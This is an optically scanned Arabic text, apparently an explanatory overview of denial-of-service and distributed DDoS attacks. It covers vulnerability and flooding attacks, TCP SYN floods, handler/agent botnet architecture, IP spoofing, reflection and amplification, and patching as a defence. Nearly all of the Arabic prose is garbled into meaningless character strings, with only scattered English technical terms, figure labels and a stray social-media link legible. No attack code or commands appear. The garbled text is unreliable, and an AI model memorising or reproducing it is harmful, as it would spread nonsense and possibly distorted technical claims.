JJC lcLal^.1 2^=^ ^ ^Ld^iJl L. La^a ^a j^A .<^.^pJl jJl ^JaJdjVI (J^-l (j^ ^J^V^ LS^ 0 Cjl£jJa3l (jx» ^jAslSI Jlj 

i o ^ (J^.I^JJ jl <C^)judJ L_jj£j aI^aI] ^iij (JIjujJ (jx» A£^)Ja3l ^L<^ ^ _^!>Iasl!I (j-a jl 4<alst-<i <J^L^xi 

Jc J jj^a^Jl 

(jc ^Ldl^JI CjLd Jx-<J! ^aj^i j > L_fljj^3l j 6^U^£3l j ^.UJI JiLd ^LalxJI CjUa^JI Sjbj <Jjg > >nl CijjljVI cil^^lml ^j| j!L 

4jj;iaJl CjLd^iJl (J Vitj (_^i3l *L<i^iJl ( ^a yzJi cilLiA j ^LojjVI (jSjoJl JJ^>^I ^^>^ J (jnqVill J^J^J C^al^-Sl <iajauVI 

„ jjoJI l^Jl Ja. .CijjljVI jl jj jjj^ll oj^-U ^iLjaijl -laiijj V jll (JjjUII Jc Ja. jjujti^ l5^^ JjH J^^ j 

(j-d <>i^Jl ( ^a jaA UiliJ ,^laA^VI J l1^*^I lV^I jl S^J^ (JjjIjojI Jc CljjljVI ^j^AaajujJ (JjjUII (jxi •^•^c 

J g ll^J J (jjjc-jj (jjill 6jLoj jjc. ^-JjaJ l^Jl ^£j>Jl (j-d3 6 J^iaa JJJ^a ^1 ( ; UjujJ V ^ J^lj a lajuljVI (JlaxJ (jl (j^A^ll 
4(jIaljC.VI Cljjljyi ^1 laJLujI (jC (JjjUII L_fl3jJJ (jl ^^.jaII (j-d 6(jLl^.VI (j-« J djUl JajJaVI Cjj^. <!L^. J 
hk*A\ gil jilt

jj£j jl j£-aj La .4jb ^ J 4jIc Lajb diujj] t^jLjiikll J Ia^ ^Axi t JaxJI 11a ?(DoS) 3-a^aJt j* jLajaJt J) uj-^W^ cs-*-^ 

CjUjV Jlg_i3l L_fl^Jl jl£ ,4_L^alja (JjS j-a t . it L c£^l £-1 j-ajl <JaLudJ jl ^a j^-9-a iL^V clijl£ J^J-a i3j J <La,laJl u^a dll ^ ^ jx» (J^H 
j,a ^jiaxJl ~* - tajU 4_JjLa^aJ Liajl jj-aj£j (jj-a^lg-xJl jli 4 jLia.VI j-a (J .^-^ J? ^ (J-^ ^ 

(jjmV^ AAaJLujJ j . jjLa^ig.xJl <Jj3 j-a 4_ilj ^t-uij bjj-a <Jj^ V CljjljVl ^C 4jujJj^3l dll jja .<La,laJl j-a jLa^pJl (J^Lk j-a (Jj£lll 

tl^J] <J jj^ jll J ^£^JJ SUS Luul (_£,i3l ^a^JjauJl . jj^kVI jja^l g <all £-a jjlS J;i*Jl dlLa jLlxJI j ^1 J^VI SjLaal j S^Axla CjVI ^ jaJfc 

^ j^Jl CjVI j-iAa. l^j) sUSSI Jc 6 j Uu i M a!^ Aijjia .[owner] tSlSLJI jl [operator] Ji-^i < [moderator] ^ cr^j 

. JL^JI L_fljjuuJl Jc <La,liJl t . la a ^a jaJfc llill] CjVL^jVI gj*^ Jc Cy^i ^ L>*J '(^USII *>^A (jfcjja jC- ^£^j3l ^aJJ jll 

jLa^pJI <J!)lk j-a aliliVI Ljajl uj^t^ <s ^ c^*^ t(jj£i3! t . <M ^ J| _sLa3l J jj a i^jLuiaI] j^j 4-^-3 'L^-a> <!! L-iAii UiAic. 

jjoiJ Cj^jII Ijl jaj (jJ^I (JjjUII " ytl\" DoS ^Vl ^-Sajujl JJ UlLa. I jSjia jjill 4ij^alji3l jLi J-dj .A^^kll 

(j-d 4^ jLoaII CjI^JjuoII j jJl<a^3l 

(_^V ^iUl li^ L_DJ ^aJ 6(jVl (^5^- .(Jj^^ 6 ( -jJUJ^ (jj^LLall <JC.J ^iUl (jj^J (jl JJJ^J (j^J 6A£jjoJ| jA ^a j^gll (j-d L_fl^Jl (jl^ lij 

(j-<» ^ rdjax]! A-uIUlII (jc V (t>i j^ ,*L<»^JI L-i^a djLoaA ^ilj^j oll^J! ^^ic CjljUJ! ^k ^ j^- ttillij ,l1jIa^JI (j>» 

.^iUI ^ ^5^* lS ' cJ^aLd ^j'q^M ^> ^Vi V c _^j3I cillj (j^ _l$jfl ^j'q^MI (jc c^LaU cdjl a-^&W 

,(jjjoJl (jxj <jaial_L<Jl o^Liall (j-a ^Lij jjlill J;ic. JjLoj jll oi^ L^Jj CjI^jjuJI (J^aau (jl LdU»J (j£-<uJl (j>» 4J| (jc tdjAUj 
( . lilajj ;4_xi^iJl (j-d (jLd^pJl £a dljjljyi <jjL^j3I JLocVI ^.^J (jj^^l $ a\\ . jl j^VI dJjLa. 4CjUl^JI (j>» b^C ^-la tl^a.j^ 

■ JJ T > *a (jUaJ Jc CjIa^JI 1 ^jIc c£^>a*J ^3^31 (jiafljJ jll ^al ."AjI (jx» <JLJ! (j-d ^L>» 

(jiajill pllll ^aJ (j^3 j 6 alalia (JjjLojI Jc Cj^j djU^gJl (jxi L^VVI (jl diLojIj^ll (j-d 5J^I Uj^3 ^DDoS iUi^J (jjl^l^ a\\ SUaJl ^aA (j-d 
tSLjaLLJ jjjJall (j-<» ^^Vl ^iJj Jc ULauJall ftj^S ^a.^C Jj bjj^- ^^-J^ ^ . a A J (jj^7>l a\\ (j>» l^a. JJS ^^C Jc 

(jj^ ^Ld^Jl M^ 31 r* ^ J^"^ ci^^ JJ^' 1 ^ Ajlc L_fl jLk-d jl ^aUuAVU 6JJ^. jA ^Ic^Vl (jU ^joiJ V A-l^jJa3l (jV Jl 

^ j y\\ (j^J jll ^ajl^aJl (j-d 6 jjir > <1}C (j!>Lk (jxi L_l£jj-<Jl 4 j> >*>1 Jc ^a£^Jl (JjVlm^l (j-d ^^juUIaI] ^jjVq\ *^J^ 

V cjIa^JI oIa Jia jl j^ J . jjj (j^a lfr»hviml j dujjjVl <— j^VI oIa Jj^^lj u^j^ *Vj& .script kiddies 

JlLa .a^I g aII (jC J;i^l P^i Jc Ij^Ui (jj^ C5^ jjQQ^ al] jU^VI Lpa*^ J "S^^ jljl ^J^J CjLa^Jl d^A Uiajl t4_l^jJa3l S^judJ JjoiJ 

jj^i <iajuj| 1 ^jlc 6 JaJjuJ! (j^-aJ J^^J ^ J^ > ^C ^^x^l (j^^ JJ^>^^ ^^>^ -^aj ^3 jj jU^VI (j-« J ^aLiJl CjLa^Jl o^A 

A£^a. iaLajl J <LilaJl J^ cJ^-^- (j-* ^J^ (JJ^ial (JjLuj j S^C jjfljla. <all jail ^AaJLoaJ (^ill j DoS ^ (j-a ^ jj 

lU^JI s-^ ^j j Alk ^ t4 Vij . nil l cilti (> l^jjJi J3! ^ CjU^SI 6 1a jl jj^ J .bypass defenses Jj jj^^ 

4^^^. Jja j^ ^ IjjjLJ ^aJJ ^3 jl ^taliiU jl ^.^Lajll S^jb J (Jj^^ L^-\ j-a ^1 ^'^ LaAjc^ 1 g > nVl ^lalj j-a J-aAJ ^3 6jj LlaJI 4_l^ljl3l 

^Aj-al^a.j ^LaJala jl 

CjLijSj ^ab^luilj tilli j t4_j^LaJl AjI j^I jLajjV 4-^.lla ojl^a j Jjl j-a l^J^ jll j j^l lS^-^ J^ QJj^>^ J^VI (J^alai ^11 ^.l^all 

|^ jIjI J^ $ ^ !<^A JLa .1 ^jlc (J jj^^JI L-lau jll AjjI jl IsJLujVI ^jl jxJl j-a o^lilajVlj tojjIalaJl b JaJjaJlj o^Liall 

j£-aJ jll l^juoij L_kstjJa3l Jalaj (J-aaJ A^^)3l CjIj^I jj^J ttilli t ■ ul a. Jl ,4^jJjaLa CjIj^I jl ( . ull i ul ^al laJlual J jIajujV I Ja*. L-lau jll 

.(JAuiaII J Ljajl L— )>la>J ^3 \ g J^lj ; jVI CjLa^Jl d^A <JlLa ^flj ^3 bj ,^a ja^Jl J ja^j ^lia^V l^J^lstlajl 



4-uIa ^^Lua 






t *<iT > >i <Jakj (J^IsujojI ;<-<i^JI jL» jaJ A-iuujJI l-uHjujVI j* jlc jj <ilUA 6 1 <Jj^il! J j£i ?*L<»^JI < . a t * a j^ 

'vulnerability attack i> JjVI ^jJI ^5-^ U s^tc .<c jj^ JSI jll c> ^ jj J <-^l Jc s^j^j* 

.flooding attack Jtill J^- J^ ^? 

11a .t^jjall c^ULqj ^ill lJ^JI ( jnWfl h ^ u ^ c ii xjj a j ^1 JjL-uj Jl l>«j JLuj jj ^jia jc Jaxj Vulnerability attack 

jjc. ^IkAxi JlLdJ ^.lg_xJl <Jj3 j>* 4JmiJl JjLoJI m 4 m a <-<i^J C5 jJaljjaVI jJj^jll J <Jlk jl ^cxal jjII >jjAjj J <Jlk S^lc jA L_a*jJa]| 
S^lc] jl 16>1ia^j t4 tS^juoJ AjUajV .AjjI^j V Ail^. J L_jlAi3l L_fl^Jl J^Jjlaj] ( . UjujJ (JjLoJI .(jjllnlll £C^JJ-G 4jl3jJJ ^aJ j £3 jJ-a 

C *<>■>> >l <iaij (J^^lxlall A-AaSlSI ^.AlilS . jjJC JjuJI jj <Y laJ ul <flll jC <Ld,liJl ^id J Sj^lill j-G SjiJ^ lil^glnll jl 4 jlg_^Jl (JjXjuJj 

I^UiJ c j^j ^j^l 11a j* < ax^al ) Jalij ^CjVUJI J .Exploit j ^in^t cJ^Jt C5^J '(exploiting a vulnerability) 
j* -ul jj^ J .CjllifSalll ^cJ jj J j 6a£jj^3I J j£ jj jjj J jl (.(middleware) ^Ijl^Jl jll j-* <*iaa t J ^ - J^ l ^Ikj J 
^^jaj 11a .(new exploits) J^ jJ*-^ ( ♦ 1T * ^ uj-^ u' 6C axjjnli Jalij £j-<^ c Jj^im^ll 

.^jJJtit^ftll ^aUiVI 6 jia^- J Jf^ L-Jjuo^q jA l^J^ > ^il j Igic C Luo^H ^aJ ^ill C <>■> > ^1 Jalaj j£ jl 

(deny service) o^fl jj ^^-^ qa^Z cr^^J ukJa LUj 1^1 802.11 ^g^t^ Jj£jjjjj lj! \nh1 j^axj t JIIaII Jjxui ^ 

Cj^tuaj^l uBjau Jxj ^jilua^U) Jj-ua jl! ALIj ."hang Up" A^Ayall (JjIxj Jjjjj ^JIj! ^,^Vnnft1| (j\ Jj jj-uu j t jki ^,lVnna 4jj ^ Jjj 
.Aijjlall (jAL Allp ^Alj &H (jIaj (jil j c Jj-ua j 4jalj ^ Cj^LuajVI (Jjjj^Ij dJlP) - laJL oaI] (jIaj .lJj^IuiaII ^^"h noti (j-a 

t Jllftlt Jjjjoj Jc^ .<-i^l J J^ ^ ^V^j Jil cJj^j Jl c>» JLuj jj (JjjSa jc; Jaxj Flooding attack 

jiajC ^jjslJjoiJ 6JJJ^ (JjLujj '(CPU Cycles) ^0^>^ a * ^ ^JJ^ C^II^LujJ J^^J ^ (JjLujJ jla>» a a II * a l . lllaJJ 

jla ^ j^JI c^^J^ ^J>*^ -^J .ftjSlill till^lujj JL^aj*Vl i^jj cJj^jj '(Bandwidth) (jUajll 

J '(*2>aJt ^jloui J ^j£ jl ^ Flooding attack i> s .<^^JI Jjj j* jj# jaUI jj^^kl^ll jl*j V 

;Ajjoijj Jl CjIjojI^juVI j-« ^ l-^A j .^5 jSa^Sl 

jjjaI! A^j^J ^Jjoisu (J^uij (JjLo-d JjJ^l ^-^^>^ ^ (J*^ ^ ^ <oJ a j^Jl j^ A-C- jJJ-« Ac- (JLujjI jjA^I ^ a1] j^J 

.dilc-la^l j^ cJ^^ j j*^i^ 

JLojjV ^lj jVr> j-« J^l <ill JJoib ^aj5J 6^lc a^>1 g aII ,L_fl^Jl ^jl jx» t^II^jjujJ <>— Lla J 6JJJ^ (JJ^ ( ; JJ^>^^ ^^>^ 

.DDoS sjIc Flooding attack ^ . jjj^^ J^ 
tilLiA jj^j ^ _<j2kjja3! jl^a> Jc- A-^^ Jl '(O^ J^ ;(JjLujJI j>» 1^ ^jjj^ (J^jj j^ DDoS ^ u -0 cJ^j 

\^.f.A (J^IxjII j j^Jl Jc cJ jj^^JI A-! jt^-Q J A-iikjJall ^jl jd Jjj L_fl jjoj Ajli toi^ L_jila3l ^ j^- -lalijajV A-iikjJa3l j A a-\\ $ a\\ CjVI jJJ Ujjoi 
.A^jS l^J jj ^ j^Jl ^ cJ-^l-*^^ ^ J^- 0 J jl Q ^ ^J^ J* lS^ (_3^\^»1 t^a j^Jl j-a J^J La (ilLiA jl£ lit .^J^ > ^> lS^^ 

j£^j A-iauJal l jl^2> J <^jj^3I <alkj Cjjl£ lil . A-iauJal l (network interface) j ja DDoS ^ ^ 

IP ^3^- L>^ J^ ^1^^ J ^^I^Iaj^q JO ^ jj ^^>^ ^^-^ f ^ ^ 6 JJ^>^^ ^^>^ L>^ ^1^^ J i ^-^\^ L ^ A 10 ^ cJ^I-*^^ 

L_fl jjuoS 6<J2kjJa3l A^.1 j Jl c)^ ^3^^ ialLajlj ^aj5J jikl jUS ^1 ^JJ V Aj| jial jjfll Jc ^A-f^jJall Jl I^JLojjIj \ £ L > jj] 

Jl AiLjaVb ^C- jJjouJI j^Jl j-« t^SUA jl£ lil .4_l^jJa3l (JJjla Jc Ji^ ^al-2k^ jl ^Lodl l-^ajl J A-! J^ > >1J A^JjaJl JjI jxi .^nml 

.^a^kJI Jjjj jl Jxu^Jl jjc; jx^ 4^a jaJt ^aj^A j* jjj£ (Flood) U^ 3 ^ 
1 4_j^^jj Ajljoj dlli A^JjudJ J uald jl a^>1 g aII L_ fljc lil ,dljjjjyij <JikjJa3l tgJ J - aJJ ^^jll <jla aSI <£jjaJl t fl ^ i aJ jl Uiajl g ^13 
^a J^A j-d ^ jjll liA J .A-ilc ^^Jtiaj] A^JjaJl Jc ^5 J^-VI .JAxJl jl A-likjJal3 ^a j^Jl j-« J^ ^ lS-^J^ tAjjljll J C-LjUl 

(3^Jj t - iDDoS ^-Bj^ ^ j > ^ ^ cJI^-^^ I^a ^jjajj , JiiUui j^j Jc jl-*^* t — s jwj a£jjoJI ^laa Jc <_£j^Vl .jixJI j-<i J£ ^DDoS 

j>ui ^aA jJC-j ^4^^k]| Jc (J jj^a^J! jjxjJaJjoaJ V O^^^) U^^^)^^ jJ-d^Jjai/Jl Jc \ - taJ) j^J t4_iikjJa]| Jc Ja^S JjjJ jjjJall 
A^jak ^a j2^A jl.^>» jlS lil . dij\ Ia£ ISP W^ 1 ^ Jl-^^VI aSliA t A>j^1ujJ ^3 aj>I g aII ; JllxJl cJjJjoj Jc ,4_2kjaJl ^jl j<Jl jjjJaLaiJj 

.ciljUi^ak j-d ciLijau jl Uiajl j^J 6<jli^3l <j3 Laj jijJ-<» JJ^>^ 
CjULjajill ^a j^A l_j1^jjI jUakVI (J^axJ J clA^ & a\\ . JjJ-^l ^^>^- £y* *^J^ J^ ^^^-^ cjj^AaII diLaak^Jl ^J^> .Vn>>n 

A jaJU^i djajll j^ ^j jA\ c_Akij ^1 j ^1 CjU^kll jia*j <jJ AjauJal l jl£ lil . jjj£j jij^ai JUilt (Flooding attack) 

C5 lak , jjbjJl I^A j-a D^liloaVI g <oA3 j^-GJ Cilia t^a^Lkll Jc dj^U Jjl jaJ JaJJJJ jl t< ■ llla]| I^A ^j3 jJ j>» ^ajL U» jj£l >JJ*j]| ( . llla]| 
U si^ j <TCP SYN ?> f ^ Ja31 (i 1 >k ? ^ .U*V J^ilb <_L^ j2 ^1 <TCP SYN flood
cj' J to^j^aJI JIj^jVI ^ Ala A^ a J (buffer memory) SjSlill 4_i^jja3l lail^j .aja^. JU^jI ?^A ~ i^i> 

J t^a j^-ll A^-^ A^^l (Jjlaju Jc ^.l^xJI ^cLaaj (JjUAI .Sj^lAI J AiKj ^_$\ cA Alall da* A-^j^ a ^ ^ g Al 

.l^Lu. j! TCP SYN ^> c> 1^ JJa ^to J 
'{flooding attacks) CjUL^iAI ^ j (vulnerability attack) * *^ > ^ t JalSj CjU^a jjj J^aUll JaaJI 4A£liAI jj 
cjUI > >ijqll ^ j^a CjUa j {vulnerability attack) c q»>^l JalSj CjL^a dUa A^ J ^ CjIa^JI ^ ajasAI u' lA^j 

.{flooding attacks) 

(Recruiting and Controlling Attacking Machines) ?JH^ cjLLSU 4-ilj*j uLJajj 

.^t$-A( Jj ^ rtln V CjVVI ^Uj .A-iau^aH Jl jjj^I ^ j^a JLujjU ^ jSj cJjjoj Jll j <c_iVI cSlljjuil L-Akjj DDoS uUjb 

6^31 jl^U ^jA-£-Al ^j£j C >% n^> J^JI I IjLuU.H J.A I J J 3 * ?<J j^-Al J CjI^JjuJI J ClAjuaLaJl J 4i jAi'rtA A qjt > ^ *L<Jaj| (jj^J La SAx. Igil 

(j^LjuJI '(zombies) ujj-^A^ ^ j*>&^ J ^ <oVimj Jll ciiYI ^miS lj^ ttAlA j^^ti ^a jj> >»vi j dlA^ll Djinjmll a^Ljj 
.(agents) <^jll ^ik^ ^^ki^j lJj^ lJ&1\ liA J .(agents) <^^j3l ji '(slaves) ±u*^\ '(daemons) 
^A o^A ^1 ^I^J Cjli ! jjjSj U (agents) ^ jll ? LfcU^^ ^^-^ 6^ 

^Lojuj) (j-a CjIc j)A~y a AiLa caJ > nj 1 g liA^j ^A^ ( ^ A£ ^» CjULoi^JI .(jAjj^u^Ai ^1 l_jL ^ ajA Lo£ 4^UaAI ^Jl ^ ^ 

< * a uj^j ^jl 1 g j1 uj ^j-d ^Al ^JuJI 4^A£ ^)joi£j ^jja^A CjIj^I o^c tALiA . jl^ a II > nj A ^^-AIj ^ujjj ^gLA! ( & A£ j! ^LQAaJLu^Ai 

' ^ j A^^VI Aj^j * Phatbot ^ JliLcAl A^f^ .^j* ^ jjj^ ^^A^ <j ^AjA ^UaAl Jc cj! J uiaJI ^ ^1 lil <c^judj 
CjULud^. ^cxilj^AI 11a j jl J^ 1 J^*^^ d al (j* djl jjuoc ^j-<i <c ^ ^I^jjojU Windows <J j^-AI 

^jl (j^-GJ L_axjJa3l Jalij A^*^^ cJ^-^- £y* j' 'DDoS ^ A^I^jjojI ^Ijoij A^ V A j5l l'^-3 t Ajj->-"-AI djl jLiLdl cAjA ^A 

^jj (jl j I Aia. a ^L^jaVl jIjI A^ u' DDoS attack agent ^^j/^j ^j^j a qj^Al Jc SjUjuill ^.l^AI l_jLou£I ^j^aj 

. jl^JI ^it_>.*>ij o^lcj Asu J^ A rtjAI A j^VI cJ^Ajj 
,UjA3 Ig-Lo A^ ^l^ialj ^j5j g Al lij dja jll <xjjja>ij <Lui (jj^laj jll L_flVI ji Cjllft Jc (G jiajj Lft IjA^ DDoS 

jjjflj j t t^l ^ a\\ j j-dl Jc pUj J^gJl 6 jijuj C-UJJJ j rtl ^T^l j iA \a")~\ a\\ A^ jll t— iVI ^ *^ un^V Alx^Jjxi dil j^l cAllA tcAli ^j-d 

_dijjljy I a£jjoi Jc 4Aj^jAI Cj! jja ^ l^Ac A j^a^Jl jl 4-yj3l I^-Iia^j ^jj Jll CjI j^VI a1 > nj (j^j .Ua Jj jsAI ^^-^ 

(Jjla jj j ^!>l£ jll L_jisu cJ^la. (j-d A^JjaJl Jc ojIaJjaJl (Jj^ > uJ Uiajl *^AV1 CjI j^VI jll (j-d <C jrt^ a c flAa jJ Jj AiLjaVU 

IjJaj CjULjajiAl ^ jll ^j^^ I^jj J^ ^A^.! j ^1 jIa^J iaia ^.l^AI J ^—^ J J 1 jVI cJ^^V M1 



(HIDING) 

^JLojjV CjVI jl 6A^.I j ^a^jjojj <j| c ? *n^> j IgJ aS\ <c. jl^AI dAlAa S^c (j-d ^_>A^ cJ^^ 3 CP" & ^ J^ 

-a-A ^ Akludj l^jjoj 11a J .(handlers or masters) j^^ cA^Jl^Ai oj^VI ^^^j .^^j Jj j-^^jVI 
.(Handler/agent architecture) J^J^ / gH*-AI SjL^ll ^ J^A^ J^Ai ^^j^ .(handlers) CjUJU^JI 



[Figure: Handler/agent DDoS architecture. Labels: Attacker; DoS traffic.]

ls a±j£ j .(handler) cjI^JL*--^! J] J jj^a jll JjS tj. in lt. n j ^ ^Vl s^c- g a\\ Jj-> > >n ^ uj^-" ^ j^j*^ t>* lsj^ <Lia 
-g JU]| JUJI ^jjalj L£ 4 stepping stones W^- cS^j (handler) cjUJU^JIj ^l^ll jl^ o£ <Ja^jll CjVVI 




[Figure label: Command/control traffic.]

a!\ (j-a^i j ^.^i CjlkLaJI dula lil .( jjWil i CjV jU^ <Sa jc^ ^ stepping stones j (handler) cj UIU^ I J£ ^vimi 
jAj l_a jjoj -Gli (handler) ^^13 L >^ill ^ .iij* ^ .(handler) cjKIU^I ^ s^l j jjj^j jl <Jj£ jll 

sjIc ^j) cjljlillj jI^LII < allk^ t> stepping stones ^ ^] . j^' stepping stones U-^j 'stepping stones 

.AjJjA (jC L_jlii3! C ftJUJ^J ^1 g &1I Ail ft*J J»Jl Ajulld 1^. L-J3U ^1) 6 (tiI3,JJ QJAjLl 

Jjjjaij* CjLg jlx-a (J^asu Ja^J CljjljVl 4£jjui ^ ^-a -IP SpOOfing ^ Aa^Lujl j!)Lk j& ^ j^^l L-laLaJ <_£j^.i 4-1^ J 

Jj£ <> l^L ^jj CjUjkJ! ^ .source IP field j*j ?J^j*ll Cj\j^ ^ £ IP header ^ ^j ^ .IP header ?cjUUJ! 

jLuixJI jlll! ftj£^j jl Jj3 ~ iklLaLjj t(^jjjj£3l Jjoj^xJI ^ji jjc £jJa jl JjUu* s-lj^.]) <Laj^J! JjuJJJ jlfr^JI 

L_flLau£l 4_Sajcj CjLo^J! ^jc L-jLaxJ! dL>liyi J^'q^*^ JL^xJI I^a ^ u j 1 u ^ ^jj^^l g ^1 ga^ll JLujjL jll 

jjj JAlrful] j^aJl jk; Axuxj DDoS gli^ll ^aU^ lP 3 *^ ^ C5^) ^) ^ IP J^"^ . J^ jll 

Lq ^jAxJI (^5^. jl ^^c- jjoi J^c (j^ajs > 11 j ^ j£ cjp Spoofing ^ .uj^?^ <s j j*^^ 

(MISUSING LEGITIMATE SERVICES) ^UjiJI Sf Ut 

<^.ll<JI jtli^ ^.l^xJI .DDoS <^ a£jU1a3I ^ LdU»j 4_l<»V!j Aijli^ jaiSI ft ^aja (jl^j IP spoofing 

^ ^jl ^JC JJjjjj ft^J^C CljUlla Jwj^)J ^aJ (j>»J J ^r^J '(DNS) U^J 1 ^^ ^aUaj Jlxi tj j£ j! JJ^ ^ 

djU^kll j ^jj-^lg-All <jjau3U 4_j^aU. li^ .(reflectors) cjLo£UJ1 <ja a£jU1<JI ^^1 j^JI Ls ^l j reflection attack ^ j^l 



https://www.facebook.com/tibea2004
(jla. ^ ^.l^xJI o^ij '(amplification) ^ > '^h l**^ ^ cijUiia (j* 4ajU d^j^ jl <LjIa ^ j Jjj jl V^*j ^1

(Distribution Effects) &0j^I 

.(j^l^ U^j JaAj <i£3 <(DDoS) tuj^ ^l^ ^l^ikiJ jj^ ^ <l> ^Uall (jixuJI ^ (Denial of service) <*^JI c> j^' 
10 j t-ili ^1 j (pure flooding) djULja^l qjLJ 3^aJI < f u' ^ JliLJI 

^a.1 g all jli ;4_ia_jJa3l Jajlj ^^ic ^jJaJ 4_Ijla»xi ^i Aa.1 g all .4-^1-^1 <^i Clul au^o 100 ^ 4_L^j 4_iajJa <ll jai ^-J^ tAjjlSIl ^ dul au^o 
^ajL j) t . iNj ;^-l_aij 4_ia_jJaII CjVIj^jI (J-Jaau] m Al <La,laJl (j* (jL»^)aJl ^UlLj 4j <j^laJI 4£jjual3 CjULjajS dj|*lal ^1 (_£-^jJ <— fl jjuj 
J jt > ^> I j>»l (jj£j 4_IVI JlLd ^aLajilj (jl£-a -1}-!^ .4_ia_jJaII jc 4£jjuo3! ^jl jx» j>Jl J^l j^-?- C3^H ^W*^ 

1 j^ J^J^ j^? <J£ .<*->Wl (j* cAlalt j* t^lo <(DDoS) £Uj^ ^ j^-SI \:° v; ^3 lit c-j^j Lai j 

<£^>a. (j* ^^i^j La ^3 jj l^_L<i LI (jli tA-ijliill ^i dul aux 10 dj!>L^ IgJ djlJL<JI CjVI (jl (jialjlial ^^ic .4_iajJaII £>l_aj 4_ijLi3l ^i dul jt-Lo 

^<jaUa <J-<il^J (J-^ (Jl V ^.l^Jl (jl (j^ ;4_i^jJa3l (jc 4^^k]| (J^J ^1} ;l^£Aj ,4_i^jJa3lj (j^aLkJl Cj!>L^ jll 

^l^Jt ^1) jiijili <> Ujfr uJaj (DDoS) 50j2J1 yto fXUS f 
jl^. (j>i jii^l (Bandwidth) (j^aill o^j^ ^j^ j^j ^j^^^j ^-f^ daLi^j (j>» j;j^l C5^^ j - ^^ ~o^i/~ ^L^JI 

^jl ^<JI ui ^ > L_a jjoj iaia ^.1 j cJ^c- cs - ^ j ^ j * >1 J ^^l (jli ^UlUj .^^-^-i j-^l l!^*^! 

AjI^J ^fl Jjt ^<JI AicLjaxi ^^1^ (j^^ 6 (DDoS) ^ j^^^ CjljVqMl ^hVimU ,V jl ^\q^ m (jjJ ^^Lkll ^^ic ja. jA\ 

.lJ^JI ^ Sjfl jJal CjVV 4^^k]l jili (jl 4-1 

^^jll CjUl^aVI (J^asu iLajl (j>»j cJ^ J^l \. v W ^ ^1 ^l 1 ^! (j^ '^^J <-!^J L>^ ^J' 4-*-l^Jl ( ; ^ ^ ^ fl3 jl 

(JjjjoixJI (jl^ lil Vj Igiflj (j^J 6,Aa.lj <!l (jxi g II tdlVl^Jl (j-« ■ JJ^)^^ ^^)^" L>^ f ^ a ^ J^jl (j -0 

^ j-s^l ^ 4£jUUl jll (jxi 1^000 jl '100 '10 (j^ .^^'j^j t^ijuall Jiold jl L(JJ&j jig a II (jc; 

jjjb o^a. (j-G t fljjaall (j^j IgJ^ jl ^ j J^Lk (j-d iaaa .^UajJal] S^jli ^a^aj V ^.Lq ^a.1 j (^1 jj (jli ttilli 

^ b ^\jIa lS^Aj f*^ L>^ 4-*^ ^l^-lj^V^ C-P^ il^SV (JjjUII (j-« L_flVVI J jj^aaJl (jl C-ua. .4-xi^aJl Ua^ 

jl jli jt$^J 4-1* j jl.i^al ^aii (j-<i j (handler) jl^aJI ^ jI^-aj (jjixilAxJI ^ajL t^jUa-VI o^xj 

^aJliJLuaJ jl oJAxILq (handler) L " ^ ** a ^3^'^ f lalLujJ (jj^ ^ ^a.1^51 (jl Clua ^Ljajl 6<Jxj^a 4 ^ ol^j e djUljJajall 

. jjuJI A-i^a^Q jl d jLixi (jj£j Jj£ jli jl$aJ <^a. j^ll ^1 jVI (jl jl '(handler) ^1*^11 c> (IRC J^) ^ jj^ 

t<JjT > ^ jj£| ^a J^-jl ^ jl (jli tdjjljyi 4£jjuj ^lail ^lA^. <^i ^jlj (jl^j (^5^- J'^ V jli ^aa.1 g all J^i^-I lij 

.^LAajll <iakj <Jail3l fii^ ^At.tiJ j ,A-iajJa3l (jxa ^-Jji^ (^^^C JJ^JI ^-^)^ ^ ^J^T^ J^^ <iaaill (jl C—Ua 

4_j^laJl Jj^Jl ^^>^ JJJ^H ^ AJjt > *a ^aj ^-ajjj t^a ^a^Jl (jc A^_iLq djUi^lc (_^l 4_al jj a£jjoJI ^ (_^^>^.VI ^ixJl 

j^-g-!l I^A AjJa ^li^ll S^cLouJI (j^-GJ V <ili t^Ulbj .<c jjJIaII jj^JI ^j^- (jc- ^ j^-g-!l^ 

(j^ ^j-<^ cJ J> *aaJl J^la. (j-d ^laull ^^Jc J^la (jj^J ^ ^jiajJall (jli 6^a.l j <Jj£ j (jxi ftAjjjj ^aJ (^ill *L<i^aJl ( ^ ^ 

£A (J^lxjll ^ d^cLoiaI] ^ ^1 J^- (^5^ j^li 4iljC-l ^aJ UJ^ ^ 6<JH<Jl Jjifjuj ^^^ic ,^jl j>Jl 

^Ja. 6j^a3l (jx» 4iLjal 4 i£ ^alA/Jl (jli 6^a.lj J^J ^ * (jj^ ^ *^ O^*^ .■4-iiljJaVI 4-! j^aJI 

jjl j^ll t flcl - ^IaJI jl£ lil .DDoS ^^1 J^l j^ill 1^ j^^H jli ^ ^l^JI (jjL 

_<l^aj ?(jUa.V! (j-« ^ jJl <icLjaxi ^1 laai ^H^J ^a.l^<iH (jli tdiUlkll J^C t *<iT > >i ^ J>ilxjl3 

pi jj! (> aj^J! AjJa ^ia cJ^^ e^l <*-ll-C.li-^! i^\jt^\ l_1xj^1I (j^ DDoS J DoS L>* CjLaaA <J*^ ^>^^ t ♦ ^ a 

^Jc- ialiaJ! j AjL^aJl j!.la. lIjjjjj] ^aUail! ^1 jjjoixi ^j^j ^3 tdil jluJ ,*L<i^aJl (j-d (jLd^)aJl AjJa SjjjjJalb <!lxi C-Lau] daLia^Jl (j-d (_£^>a.! 
^IgJl 2^1 jJl j Jjt <xJaj! (>« (Patch) Cjla-iau^ill JaliaJ! tCj^Vl AjjjjjJa jo>Jl iallxJl (J^V tjVl Aljj£i 

fii^ 6L_Luj^U (j^lj .^^a-jlaJl ^liJ! (jjj^a. (jljla.1 (j>» tT<< ^j]| CjlAa-gJl (jx» ^1 L_flLau£V cJ^^I c 4_xJaj| ^ixjoijj ;(_^^)a.V! 

;<J j^-d 4_jl_AaJ! jl.Aa. lA-laj ^^jII JjJ>J! ^^>^- (j^ ^ J?^^ clA^ .^*laJ! (j>» (jUi^aJl .Ua ^cLaaJ (jl Ullc. 4_iixiV! CjUl^aV! 

^1 ^glc (Jasu (jl (j^-aJ 64_iajJa!l ^jl jx» ^lilLajl Ja£2 DoS (* L — ^ jjjouJ! JJ^>^I ^^>^- (j^ ^ g j ui J-^^ 

^Ld^aJ! ( CjI ^.bl (jj^>l <S ^ (j^^ .Aj^LjlS! 4_ILgcIj ^1^13 6^1x1 4_a jiii-d (jj^J (jl t . laj ^^1 tillj l^iS Laj tla. jiii* ^jlJ! -^j-<» 
